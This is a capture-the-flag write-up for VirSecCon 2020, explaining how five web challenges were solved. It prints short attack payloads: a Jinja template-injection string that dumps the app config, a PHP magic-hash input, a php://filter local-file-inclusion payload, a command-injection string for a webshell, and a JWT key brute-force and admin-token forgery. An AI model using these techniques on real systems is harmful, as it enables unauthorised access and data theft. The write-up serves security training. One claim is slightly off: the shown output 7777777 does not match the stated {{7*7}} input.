VirSecCon CTF 2020 Writeup

FLASK

The very first thing that should caught our attention is that it is a flask application , therfore one should check for SSTI(server side template injection). Now the job is to identify which SSTI engine .Using the payload

{{7*7}}

the output 7777777 in response box indicates that it is jinja template engine.Each of flask object has its configuration stored in configuration attribute.Therefor using the simple payload for displaying the configuration will display the flag.

{{config}}

'SECRET_KEY': 'LLS{server_side_template_injection_unmasked}'

MAGICIAN

From the challenge name it can be hinted that it is talking about the concept of php magic hashes.in PHP two strings matching the regular expression 0+e[0-9]+ compared with == returns true. For eg -'0e1' == '00e2'

In order to get the flag we just have to enter a string whose md5 hash starts with 0e or 00e. The reason why we are entring string not any numeric value is because it has a filter for numeric value. After some digging around , I came up with “KnCM6ogsNA1W" whose hash is 00e73414578113850089230341919829

GLHF

Opening the url mentioned in challenge will lead us to a page which has a bunch of directories. Most of them basically redirect to google but the FLAG directory will redirect you http://jh2i.com:50014/index.php?page=FLAG.

Viewing the source code of the page could indicate the possibilities for the LFI. Now using intruder i ran all my payloads for LFI but none of them produced positive results.

Then I remembered that there is another way to conduct LFI i.e through php filters.Now using the payload php://filter/convert.base64-encode/resource=FLAG on url I got base64 encoded string. Decoded the string and found source code of a html page within which flag was hidden.

LLS{lmfao_php_filters_ftw}

10 CHARACTER WEBSHELL

Initially seeing the source code I tried to execute commands like ls , sent through parameter.

It gave me a list of file including flag.txt. Now when i tried to print the file using c=cat%20flag.txt it gave and error that it is too long. Thus we need to think of a command less than 10 characters that could print the shell.

Now since I had to keep characters minimum and I know the flag file will contain ‘{‘ command “grep -r {“ worked for me and printed the flag

JaWT

As suggested by the name jwt token based challenge.Since none attack and other encryption related attack did’nt worked over here our option was to guess the key that was used for jwt signature.

We can use this awesome github tool jwt-tool to bruteforce the pass key used for signing the token. For the wordlists use our favourite ‘rockyou.txt’.

After obtaining the key our task is to forge the signature. Intercept the request and send it to repeater in burp .Install the burp extension “Json web token”. Now open this request in this extension

Change user to admin and set the settings to recalculate the signature and enter the key as “fuckit” .Now hit go and we will get our flag in response.